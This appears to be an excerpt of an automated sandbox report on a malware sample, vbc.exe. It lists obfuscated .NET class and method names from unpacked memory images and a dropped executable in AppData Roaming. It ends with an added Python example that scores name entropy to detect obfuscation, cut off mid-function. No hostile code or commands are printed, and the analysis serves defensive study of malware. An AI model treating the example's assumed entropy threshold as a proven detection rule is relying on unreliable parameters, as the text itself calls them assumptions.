          Source: 0.0.vbc.exe.6f0000.0.unpack, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.cs | High entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
          Source: 0.0.vbc.exe.6f0000.0.unpack, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.cs | High entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
          Source: 0.0.vbc.exe.6f0000.0.unpack, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.cs | High entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
          Source: 0.0.vbc.exe.6f0000.0.unpack, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.cs | High entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
          Source: 0.0.vbc.exe.6f0000.0.unpack, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.cs | High entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
          Source: 0.0.vbc.exe.6f0000.0.unpack, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.cs | High entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
          Source: 8.0.vbc.exe.d10000.5.unpack, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.cs | High entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
          Source: 8.0.vbc.exe.d10000.5.unpack, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.cs | High entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
          Source: 8.0.vbc.exe.d10000.5.unpack, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.cs | High entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
          Source: 8.0.vbc.exe.d10000.5.unpack, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.cs | High entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
          Source: 8.0.vbc.exe.d10000.5.unpack, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.cs | High entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
          Source: 8.0.vbc.exe.d10000.5.unpack, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.cs | High entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
          Source: 8.0.vbc.exe.d10000.5.unpack, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.cs | High entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
          Source: 8.0.vbc.exe.d10000.5.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs | High entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
          Source: 8.0.vbc.exe.d10000.2.unpack, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.cs | High entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
          Source: 8.0.vbc.exe.d10000.2.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs | High entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
          Source: 8.0.vbc.exe.d10000.2.unpack, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.cs | High entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
          Source: 8.0.vbc.exe.d10000.2.unpack, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.cs | High entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
          Source: 8.0.vbc.exe.d10000.2.unpack, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.cs | High entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
          Source: 8.0.vbc.exe.d10000.2.unpack, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.cs | High entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
          Source: 8.0.vbc.exe.d10000.2.unpack, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.cs | High entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
          Source: 8.0.vbc.exe.d10000.2.unpack, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.cs | High entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
          Source: 8.0.vbc.exe.d10000.7.unpack, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.cs | High entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
          Source: 8.0.vbc.exe.d10000.7.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs | High entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
          Source: 8.0.vbc.exe.d10000.7.unpack, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.cs | High entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
          Source: 8.0.vbc.exe.d10000.7.unpack, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.cs | High entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
          Source: 8.0.vbc.exe.d10000.7.unpack, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.cs | High entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
          Source: 8.0.vbc.exe.d10000.7.unpack, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.cs | High entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
          Source: 8.0.vbc.exe.d10000.7.unpack, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.cs | High entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
          Source: 8.0.vbc.exe.d10000.7.unpack, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.cs | High entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
          Source: 8.0.vbc.exe.d10000.0.unpack, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.cs | High entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
          Source: 8.0.vbc.exe.d10000.0.unpack, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.cs | High entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
          Source: 8.0.vbc.exe.d10000.0.unpack, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.cs | High entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
          Source: 8.0.vbc.exe.d10000.0.unpack, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.cs | High entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
          Source: 8.0.vbc.exe.d10000.0.unpack, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.cs | High entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
          Source: 8.0.vbc.exe.d10000.0.unpack, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.cs | High entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
          Source: 8.0.vbc.exe.d10000.0.unpack, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.cs | High entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
          Source: 8.0.vbc.exe.d10000.0.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs | High entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
          Source: 8.0.vbc.exe.d10000.9.unpack, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.cs | High entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
          Source: 8.0.vbc.exe.d10000.9.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs | High entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
          Source: 8.0.vbc.exe.d10000.9.unpack, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.cs | High entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
          Source: 8.0.vbc.exe.d10000.9.unpack, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.cs | High entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
          Source: 8.0.vbc.exe.d10000.9.unpack, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.cs | High entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
          Source: 8.0.vbc.exe.d10000.9.unpack, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.cs | High entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
          Source: 8.0.vbc.exe.d10000.9.unpack, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.cs | High entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
          Source: 8.0.vbc.exe.d10000.9.unpack, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.cs | High entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
          Source: 8.0.vbc.exe.d10000.3.unpack, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.cs | High entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
          Source: 8.0.vbc.exe.d10000.3.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs | High entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
          Source: 8.0.vbc.exe.d10000.3.unpack, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.cs | High entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
          Source: 8.0.vbc.exe.d10000.3.unpack, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.cs | High entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
          Source: 8.0.vbc.exe.d10000.3.unpack, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.cs | High entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
          Source: 8.0.vbc.exe.d10000.3.unpack, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.cs | High entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
          Source: 8.0.vbc.exe.d10000.3.unpack, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.cs | High entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
          Source: 8.0.vbc.exe.d10000.3.unpack, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.cs | High entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
          Source: 8.2.vbc.exe.d10000.1.unpack, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.cs | High entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
          Source: 8.2.vbc.exe.d10000.1.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs | High entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
          Source: 8.2.vbc.exe.d10000.1.unpack, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.cs | High entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
          Source: 8.2.vbc.exe.d10000.1.unpack, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.cs | High entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
          Source: 8.2.vbc.exe.d10000.1.unpack, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.cs | High entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
          Source: 8.2.vbc.exe.d10000.1.unpack, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.csHigh entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
          Source: 8.2.vbc.exe.d10000.1.unpack, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.csHigh entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
          Source: 8.2.vbc.exe.d10000.1.unpack, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.csHigh entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
          Source: 8.0.vbc.exe.d10000.1.unpack, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.csHigh entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
          Source: 8.0.vbc.exe.d10000.1.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.csHigh entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
          Source: 8.0.vbc.exe.d10000.1.unpack, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.csHigh entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
          Source: 8.0.vbc.exe.d10000.1.unpack, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.csHigh entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
          Source: 8.0.vbc.exe.d10000.1.unpack, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.csHigh entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
          Source: 8.0.vbc.exe.d10000.1.unpack, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.csHigh entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
          Source: 8.0.vbc.exe.d10000.1.unpack, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.csHigh entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
          Source: 8.0.vbc.exe.d10000.1.unpack, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.csHigh entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
          Source: C:\Users\user\Desktop\vbc.exeFile created: C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exeJump to dropped file
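The "High entropy of concatenated method names" rows above are the sandbox's way of saying the .NET assembly went through a renaming obfuscator: the method names of a class, glued together, look like random alphanumerics rather than words. The Python below is an added example, not part of the Joe Sandbox report or of the sample, that reproduces that measurement. It takes two classes copied from the rows above, adds a readable stream class constructed for contrast, computes Shannon entropy in bits per character over each class's concatenated names, and flags anything above a threshold. The 4.6-bit threshold, the list of compiler-generated names that are excluded before measuring, and the minimum length are assumptions, not Joe Sandbox's parameters.

```python
import math

# Method names from two classes in this report's "High entropy of concatenated
# method names" rows, plus one readable class constructed for comparison.
SAMPLE_CLASSES = {
    "kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN": [
        "uvf2wUDeWh", "Kbm2rmq0u3", "qjW2EGi83Q", "uGU2zZYrcs", "NXUxOKjOTP",
        "hHCxHKlP66", "rkSx2JhFE7", "IYlxxdHdvs", "SZXxsdRmD7", "tCIxa2TWf4",
    ],
    "bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W": [
        ".ctor", "XIBxdh8Ly9", "DataRead", "l37xZatdoJ", "Dispose",
        "proxqCZymk", "yuVxVmWmTi", "He3xbZMoHa", "zIOxRLhoDl", "rxcxeXmAaP",
    ],
    # Constructed: what an unobfuscated stream class typically looks like.
    "Example/ReadableStream": [
        ".ctor", "DataRead", "Dispose", "ReadBytes", "WriteBytes",
        "Flush", "Close", "GetLength", "SetPosition", "ToString",
    ],
}

# Compiler-generated or universally overridden names say nothing about
# obfuscation, so they are dropped before measuring (assumed list).
IGNORED_NAMES = {".ctor", ".cctor", "Dispose", "Finalize", "Equals",
                 "GetHashCode", "ToString"}


def shannon_entropy(text):
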